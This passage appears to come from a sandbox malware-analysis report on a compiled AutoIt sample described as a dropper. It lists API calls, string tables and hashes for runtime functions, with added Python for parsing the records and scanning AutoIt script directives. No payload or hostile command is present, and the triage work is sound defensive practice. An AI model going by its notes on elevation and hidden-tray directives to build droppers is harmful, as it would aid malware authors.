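SECTIONS = {"Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}


def _clean(raw):
    line = raw.strip()
    return line[1:].strip() if line.startswith("•") else line


def parse_records(text):
    """Split `text` into one dict per function record (each starts at 'APIs')."""
    records, rec, section = [], None, None
    for raw in text.splitlines():
        line = _clean(raw)
        if not line:
            continue
        if line == "APIs":
            rec = {"apis": [], "associated": [], "strings": [], "unparsed": []}
            records.append(rec)
            section = line
            continue
        if rec is None:                   # page text before the first record
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                rec["apis"].append({
                    "name": m["name"], "module": m["mod"], "ref": m["ref"].upper(),
                    "args": m["args"].split(",") if m["args"] is not None else [],
                    "subcall": m["sub"],  # set when the call sits in a callee
                })
            else:
                rec["unparsed"].append(line)
            continue
        m = KV_RE.match(line)
        if not m:
            rec["unparsed"].append(line)
            continue
        key, val = m["key"], m["val"]
        val = val.removesuffix("Download File").strip()   # HTML link residue
        if key == "Associated":
            rec["associated"].append(val)
        elif key == "String ID":
            rec["strings"] = val.split("$")   # '$' is the report's separator
        elif key == "Source File":
            file_, _, rest = val.partition(", Offset: ")
            rec["source"], rec["offset"] = file_, rest.split(",")[0]
        else:
            rec[key] = val                    # Opcode ID, Instruction Fuzzy Hash, ...
    return records


def find_by_string(records, needle):
    """Records whose string table mentions `needle` (case-insensitive)."""
    needle = needle.lower()
    return [r for r in records if any(needle in s.lower() for s in r["strings"])]


def api_names(rec):
    """Sorted MODULE!Function names for a quick look at what a function does."""
    return sorted({f'{a["module"]}!{a["name"]}' for a in rec["apis"]})


def pivot_keys(records):
    """(Opcode ID, Instruction Fuzzy Hash) pairs to match against other reports."""
    return [(r.get("Opcode ID"), r.get("Instruction Fuzzy Hash")) for r in records]


# Excerpt of two records from this page (string tables shortened).
SAMPLE = dedent(r"""
    APIs
    • SetErrorMode.KERNEL32(00000001), ref: 006BAD1E
    • GetDriveTypeW.KERNEL32(?,006DFAC0,?,\\.\,006DF910), ref: 006BADFB
    • SetErrorMode.KERNEL32(00000000,006DFAC0,?,\\.\,006DF910), ref: 006BAF59
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmpDownload File
    Similarity
    • API ID: ErrorMode$DriveType
    • String ID: 1394$ATA$CDROM$Fixed$Network$PhysicalDrive$RAMDisk$Removable$USB$Unknown$\\.\$iSCSI
    • Opcode ID: d8fb6a02feea4a85c71679075e2bf536d6e34f6f9ff97c51318240628f6fe77b
    • Instruction Fuzzy Hash: 3B5191F0644205EACB90EF90C942CFD73A7EB08701B24815AF847A72D1DA759D8AEB57
    APIs
    Strings
    Similarity
    • API ID: __wcsnicmp
    • String ID: #OnAutoItStartRegister$#ce$#cs$#include$#notrayicon$#requireadmin$Bad directive syntax error
    • Opcode ID: 586137384ce90955e49d7fa855c51334b1b1521af4b70ffb5f27a10cd8af0b85
""")

if __name__ == "__main__":
    for r in parse_records(SAMPLE):
        print(r.get("Opcode ID", "")[:16], api_names(r), r["strings"][:4])
```

Run it over the saved report text (or the whole function section) and feed `pivot_keys()` into a search across other reports; `find_by_string(records, "#requireadmin")` locates the AutoIt directive parser, a quick way to confirm the function is runtime code rather than the injected payload.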
                                                    APIs
                                                    • GetSysColor.USER32(00000012), ref: 006DA903
                                                    • SetTextColor.GDI32(?,?), ref: 006DA907
                                                    • GetSysColorBrush.USER32(0000000F), ref: 006DA91D
                                                    • GetSysColor.USER32(0000000F), ref: 006DA928
                                                    • CreateSolidBrush.GDI32(?), ref: 006DA92D
                                                    • GetSysColor.USER32(00000011), ref: 006DA945
                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 006DA953
                                                    • SelectObject.GDI32(?,00000000), ref: 006DA964
                                                    • SetBkColor.GDI32(?,00000000), ref: 006DA96D
                                                    • SelectObject.GDI32(?,?), ref: 006DA97A
                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 006DA999
                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 006DA9B0
                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 006DA9C5
                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 006DA9ED
                                                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 006DAA14
                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 006DAA32
                                                    • DrawFocusRect.USER32(?,?), ref: 006DAA3D
                                                    • GetSysColor.USER32(00000011), ref: 006DAA4B
                                                    • SetTextColor.GDI32(?,00000000), ref: 006DAA53
                                                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 006DAA67
                                                    • SelectObject.GDI32(?,006DA5FA), ref: 006DAA7E
                                                    • DeleteObject.GDI32(?), ref: 006DAA89
                                                    • SelectObject.GDI32(?,?), ref: 006DAA8F
                                                    • DeleteObject.GDI32(?), ref: 006DAA94
                                                    • SetTextColor.GDI32(?,?), ref: 006DAA9A
                                                    • SetBkColor.GDI32(?,?), ref: 006DAAA4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                    • String ID: @U=u
                                                    • API String ID: 1996641542-2594219639
                                                    • Opcode ID: 0172b88d312611cecd6cbb02f6b8e43515310b99f5d4e1554fd96b1368567fdf
                                                    • Instruction ID: 1e151939c9e66781f6bae3d74f3f9762f0f1b34e5e5e034dca911cc0dfdc87c1
                                                    • Opcode Fuzzy Hash: 0172b88d312611cecd6cbb02f6b8e43515310b99f5d4e1554fd96b1368567fdf
                                                    • Instruction Fuzzy Hash: 6E513E71D01208EFDB109FA4DC48EAE7BBAEF08320F155226F916AB2A1D7759940DB50
                                                    APIs
                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 006D9AD2
                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 006D9B8B
                                                    • SendMessageW.USER32(?,00001102,00000002,?), ref: 006D9BA7
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window
                                                    • String ID: 0$@U=u$hW
                                                    • API String ID: 2326795674-1221071083
                                                    • Opcode ID: d6e6ed1af5f6baac44f2db34c934877b38fdaf8a1b91608758c5ccce29e96e65
                                                    • Instruction ID: f26564183c3ff39b5ba50348c961d124cc45a4ecc0069be09ddb4844f10be0b4
                                                    • Opcode Fuzzy Hash: d6e6ed1af5f6baac44f2db34c934877b38fdaf8a1b91608758c5ccce29e96e65
                                                    • Instruction Fuzzy Hash: D202CD30909241AFD725CF24C849BEABBE6FF89314F04852EF999D63A1C774D944CB62
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 006BAD1E
                                                    • GetDriveTypeW.KERNEL32(?,006DFAC0,?,\\.\,006DF910), ref: 006BADFB
                                                    • SetErrorMode.KERNEL32(00000000,006DFAC0,?,\\.\,006DF910), ref: 006BAF59
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                    • API String ID: 2907320926-4222207086
                                                    • Opcode ID: d8fb6a02feea4a85c71679075e2bf536d6e34f6f9ff97c51318240628f6fe77b
                                                    • Instruction ID: bea6755d8b281624538801fb142243651449cd17c06d93c9482cb496c0b8d395
                                                    • Opcode Fuzzy Hash: d8fb6a02feea4a85c71679075e2bf536d6e34f6f9ff97c51318240628f6fe77b
                                                    • Instruction Fuzzy Hash: 3B5191F0644205EACB90EF90C942CFD73A7EB08701B24815AF847A72D1DA759D8AEB57
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: __wcsnicmp
                                                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                    • API String ID: 1038674560-86951937
                                                    • Opcode ID: 586137384ce90955e49d7fa855c51334b1b1521af4b70ffb5f27a10cd8af0b85
                                                    • Instruction ID: e5372e17adc8870cd1851bea6db075fa58eaa433d2ff8948d31651a6e2481dc6
                                                    • Opcode Fuzzy Hash: 586137384ce90955e49d7fa855c51334b1b1521af4b70ffb5f27a10cd8af0b85
                                                    • Instruction Fuzzy Hash: 358128B0600216ABCB60BB60DC52FEB37ABAF15701F444129FC056B296EB61DE49D369
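The `__wcsnicmp` function above is, judging by its string table, the AutoIt runtime's script-directive parser: it recognises the `#cs`/`#ce` (`#comments-start`/`#comments-end`) comment groups, `#include`, `#include-once`, `#notrayicon`, `#requireadmin`, `#pragma compile` and `#OnAutoItStartRegister`, and carries the three error texts it can raise. This is runtime code shipped with every compiled AutoIt binary, not payload logic, but it is the part that decides which directives will be in effect once the embedded script is extracted (`#RequireAdmin`, `#NoTrayIcon` and `#OnAutoItStartRegister` are the ones that matter in a dropper). As an added example, not AutoIt's code nor anything from the sample, here is a Python scanner that performs the same case-insensitive prefix matching the runtime does with `wcsnicmp`, skips comment groups and reports with the runtime's own error strings. The sample script is constructed; nested comment groups are handled as the AutoIt documentation describes, which this page does not show, and treating a stray `#ce` as a syntax error is this example's choice.

```python
"""Added example (not AutoIt's code): a directive scanner mirroring the
string table of the __wcsnicmp function above.  Case-insensitive prefix
matching stands in for the runtime's wcsnicmp calls."""
import re

# Directive names present in the function's string table on the page.
# Longer names come first so '#include-once' is not read as '#include'.
DIRECTIVES = ("#OnAutoItStartRegister", "#include-once", "#include",
              "#notrayicon", "#pragma compile", "#requireadmin")
COMMENT_OPEN = ("#comments-start", "#cs")
COMMENT_CLOSE = ("#comments-end", "#ce")
# #include accepts "file", 'file' or <file>; anything else is unparsable.
INCLUDE_RE = re.compile(r'"([^"]+)"' + r"|'([^']+)'" + r"|<([^>]+)>")


class DirectiveError(ValueError):
    """Carries the runtime's own error texts."""


def _matches(line, keywords):
    """Return the keyword `line` starts with (case-insensitive), else None."""
    low = line.lower()
    for kw in keywords:
        n = len(kw)
        if low.startswith(kw.lower()) and (
            len(low) == n or not (low[n].isalnum() or low[n] in "-_")
        ):
            return kw
    return None


def _include_target(arg, no):
    m = INCLUDE_RE.fullmatch(arg)
    if not m:
        raise DirectiveError(f"line {no}: Cannot parse #include")
    return next(g for g in m.groups() if g)


def scan_directives(script):
    """Strip #cs/#ce groups and collect directives.

    Returns (directives, body): directives is a list of
    (canonical name, argument text, line number), body the remaining
    script lines.  Comment groups nest, as the AutoIt docs describe
    (assumption; not something this page shows)."""
    directives, body, depth = [], [], 0
    for no, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if _matches(line, COMMENT_OPEN):
            depth += 1
            continue
        if _matches(line, COMMENT_CLOSE):
            if depth == 0:   # stray #ce: treated as a syntax error here (assumption)
                raise DirectiveError(f"line {no}: Bad directive syntax error")
            depth -= 1
            continue
        if depth:
            continue                      # inside a comment group
        if not line.startswith("#"):
            body.append(raw)
            continue
        name = _matches(line, DIRECTIVES)
        if name is None:
            raise DirectiveError(f"line {no}: Bad directive syntax error")
        arg = line[len(name):].strip()
        if name == "#include":
            arg = _include_target(arg, no)
        directives.append((name, arg, no))
    if depth:
        raise DirectiveError("Unterminated group of comments")
    return directives, body


def directive_error(script):
    """The runtime-style error text for `script`, or None when it parses."""
    try:
        scan_directives(script)
    except DirectiveError as exc:
        return str(exc)
    return None


# Constructed sample, not from the analysed binary.
SAMPLE_SCRIPT = """#NoTrayIcon
#RequireAdmin
#include <Crypt.au3>
#include-once
#CS ------------------------------------------------------------------
   #include "inside a comment group, must be ignored"
#CE ------------------------------------------------------------------
#pragma compile(Icon, app.ico)
#OnAutoItStartRegister "_Startup"
Local $hCrypt = _Crypt_Startup()
MsgBox(0, "x", "body line")
"""

if __name__ == "__main__":
    found, rest = scan_directives(SAMPLE_SCRIPT)
    for name, arg, no in found:
        print(f"{no:>3}: {name} {arg}")
    print(len(rest), "body lines")
```

Run it over a script recovered from a compiled AutoIt sample before reading the body: the directive list tells you whether the dropper demands elevation, hides its tray icon or registers a function to run before the script proper, and the comment-group stripping removes the large `#cs` blocks that obfuscated AutoIt droppers commonly use as padding.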
                                                    APIs
                                                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 006D8AC1
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006D8AD2
                                                    • CharNextW.USER32(0000014E), ref: 006D8B01
                                                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 006D8B42
                                                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 006D8B58
                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 006D8B69
                                                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 006D8B86
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 006D8BD8
                                                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 006D8BEE
                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 006D8C1F
                                                    • _memset.LIBCMT ref: 006D8C44
                                                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 006D8C8D
                                                    • _memset.LIBCMT ref: 006D8CEC
                                                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 006D8D16
                                                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 006D8D6E
                                                    • SendMessageW.USER32(?,0000133D,?,?), ref: 006D8E1B
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006D8E3D
                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006D8E87
                                                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006D8EB4
                                                    • DrawMenuBar.USER32(?), ref: 006D8EC3
                                                    • SetWindowTextW.USER32(?,0000014E), ref: 006D8EEB
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                    • String ID: 0$@U=u$hW
                                                    • API String ID: 1073566785-1221071083
                                                    • Opcode ID: aab5258733d077748abbaf4447c84554ed1fae5b3a0a252a85e231178edc69fb
                                                    • Instruction ID: 93d0f9ca51d1ef1288d59e0598bb45df2be8e81e0e03fb465b9c9e3e3c73b1c5
                                                    • Opcode Fuzzy Hash: aab5258733d077748abbaf4447c84554ed1fae5b3a0a252a85e231178edc69fb
                                                    • Instruction Fuzzy Hash: 70E15C70D01209AEDB209F55CC88AEE7BBAEF09750F14815BF915AB390DB709A81DF60
                                                    APIs
                                                    • GetCursorPos.USER32(?), ref: 006D49CA
                                                    • GetDesktopWindow.USER32 ref: 006D49DF
                                                    • GetWindowRect.USER32(00000000), ref: 006D49E6
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 006D4A48
                                                    • DestroyWindow.USER32(?), ref: 006D4A74
                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 006D4A9D
                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 006D4ABB
                                                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 006D4AE1
                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 006D4AF6
                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 006D4B09
                                                    • IsWindowVisible.USER32(?), ref: 006D4B29
                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 006D4B44
                                                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 006D4B58
                                                    • GetWindowRect.USER32(?,?), ref: 006D4B70
                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 006D4B96
                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 006D4BB0
                                                    • CopyRect.USER32(?,?), ref: 006D4BC7
                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 006D4C32
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                    • String ID: ($0$tooltips_class32
                                                    • API String ID: 698492251-4156429822
                                                    • Opcode ID: 47fa11f4f23eb112144fff3fcf4a95182ccafdfd2fdeaad116583653c8160d9e
                                                    • Instruction ID: 5b9dd665c12c0b3be2ea177658d26ec631af6e8296487385318e61beec8c1e51
                                                    • Opcode Fuzzy Hash: 47fa11f4f23eb112144fff3fcf4a95182ccafdfd2fdeaad116583653c8160d9e
                                                    • Instruction Fuzzy Hash: 00B17B71A04340AFDB44DF65C844B6ABBE6BF88310F04891EF99A9B3A1DB71EC05CB55
                                                    APIs
                                                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 006B44AC
                                                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 006B44D2
                                                    • _wcscpy.LIBCMT ref: 006B4500
                                                    • _wcscmp.LIBCMT ref: 006B450B
                                                    • _wcscat.LIBCMT ref: 006B4521
                                                    • _wcsstr.LIBCMT ref: 006B452C
                                                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 006B4548
                                                    • _wcscat.LIBCMT ref: 006B4591
                                                    • _wcscat.LIBCMT ref: 006B4598
                                                    • _wcsncpy.LIBCMT ref: 006B45C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                     • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                     • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                    • API String ID: 699586101-1459072770
                                                    • Opcode ID: 041965f7b4e49d8402d1a723ba81ccafb5f0cce1b8e205d1fb1ceb9ae6e3cbdc
                                                    • Instruction ID: 32ba3776dddfb3dd76b69705817208b9736cfab5095151409450f5b0e92a03fe
                                                    • Opcode Fuzzy Hash: 041965f7b4e49d8402d1a723ba81ccafb5f0cce1b8e205d1fb1ceb9ae6e3cbdc
                                                    • Instruction Fuzzy Hash: AE41F772900211BBEB50AB749C07EFF77AEDF41710F04406EF909A6283EE359A4197A9
                                                    APIs
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006528BC
                                                    • GetSystemMetrics.USER32(00000007), ref: 006528C4
                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 006528EF
                                                    • GetSystemMetrics.USER32(00000008), ref: 006528F7
                                                    • GetSystemMetrics.USER32(00000004), ref: 0065291C
                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00652939
                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00652949
                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0065297C
                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00652990
                                                    • GetClientRect.USER32(00000000,000000FF), ref: 006529AE
                                                    • GetStockObject.GDI32(00000011), ref: 006529CA
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 006529D5
                                                      • Part of subcall function 00652344: GetCursorPos.USER32(?), ref: 00652357
                                                      • Part of subcall function 00652344: ScreenToClient.USER32(007157B0,?), ref: 00652374
                                                      • Part of subcall function 00652344: GetAsyncKeyState.USER32(00000001), ref: 00652399
                                                      • Part of subcall function 00652344: GetAsyncKeyState.USER32(00000002), ref: 006523A7
                                                    • SetTimer.USER32(00000000,00000000,00000028,00651256), ref: 006529FC
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                    • String ID: @U=u$AutoIt v3 GUI
                                                    • API String ID: 1458621304-2077007950
                                                    • Opcode ID: 0bbcbd1c7e6530c4caf2b51814710a5a2f7c74a2ad76466ac6dd5c3ff7b3d9af
                                                    • Instruction ID: 748a17b70acfef09442781a37ce579a7ef60d90afef93e5502be19273eb21856
                                                    • Opcode Fuzzy Hash: 0bbcbd1c7e6530c4caf2b51814710a5a2f7c74a2ad76466ac6dd5c3ff7b3d9af
                                                    • Instruction Fuzzy Hash: 8EB16D71A0020ADFDB14DFA8DC95BED7BA6FB48311F108229FA16A62D0DB749845CB54
                                                    APIs
                                                      • Part of subcall function 00652612: GetWindowLongW.USER32(?,000000EB), ref: 00652623
                                                    • DragQueryPoint.SHELL32(?,?), ref: 006DC627
                                                      • Part of subcall function 006DAB37: ClientToScreen.USER32(?,?), ref: 006DAB60
                                                      • Part of subcall function 006DAB37: GetWindowRect.USER32(?,?), ref: 006DABD6
                                                      • Part of subcall function 006DAB37: PtInRect.USER32(?,?,006DC014), ref: 006DABE6
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006DC690
                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 006DC69B
                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 006DC6BE
                                                    • _wcscat.LIBCMT ref: 006DC6EE
                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 006DC705
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 006DC71E
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 006DC735
                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 006DC757
                                                    • DragFinish.SHELL32(?), ref: 006DC75E
                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 006DC851
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1378345502.0000000000651000.00000020.00000001.01000000.00000003.sdmp, Offset: 00650000, based on PE: true
                                                    • Associated: 00000000.00000002.1378322142.0000000000650000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.00000000006DF000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378424823.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378495646.000000000070E000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.1378515032.0000000000717000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_650000_wWXR5js3k2.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$@U=u$hW$pbq
                                                    • API String ID: 169749273-3829141871
                                                    • Opcode ID: 6c4dc77ed51f08b76ebc5e33b376a65e790493341c894562ed99ab2e1133901d
                                                    • Instruction ID: e52b54a388dba7f45684003594c044b2a38f0d60f6604614134a32c4b03fe9e7
                                                    • Opcode Fuzzy Hash: 6c4dc77ed51f08b76ebc5e33b376a65e790493341c894562ed99ab2e1133901d
                                                    • Instruction Fuzzy Hash: B1619F71508345AFC701DF64CC85D9FBBFAEF89310F004A2EF592962A1DB309A49CB56
                                                    APIs
                                                    • _memset.LIBCMT ref: 006DA259
                                                    • DestroyWindow.USER32(?,?), ref: 006DA2D3
                                                      • Part of subcall function 00657BCC: _memmove.LIBCMT ref: 00657C06
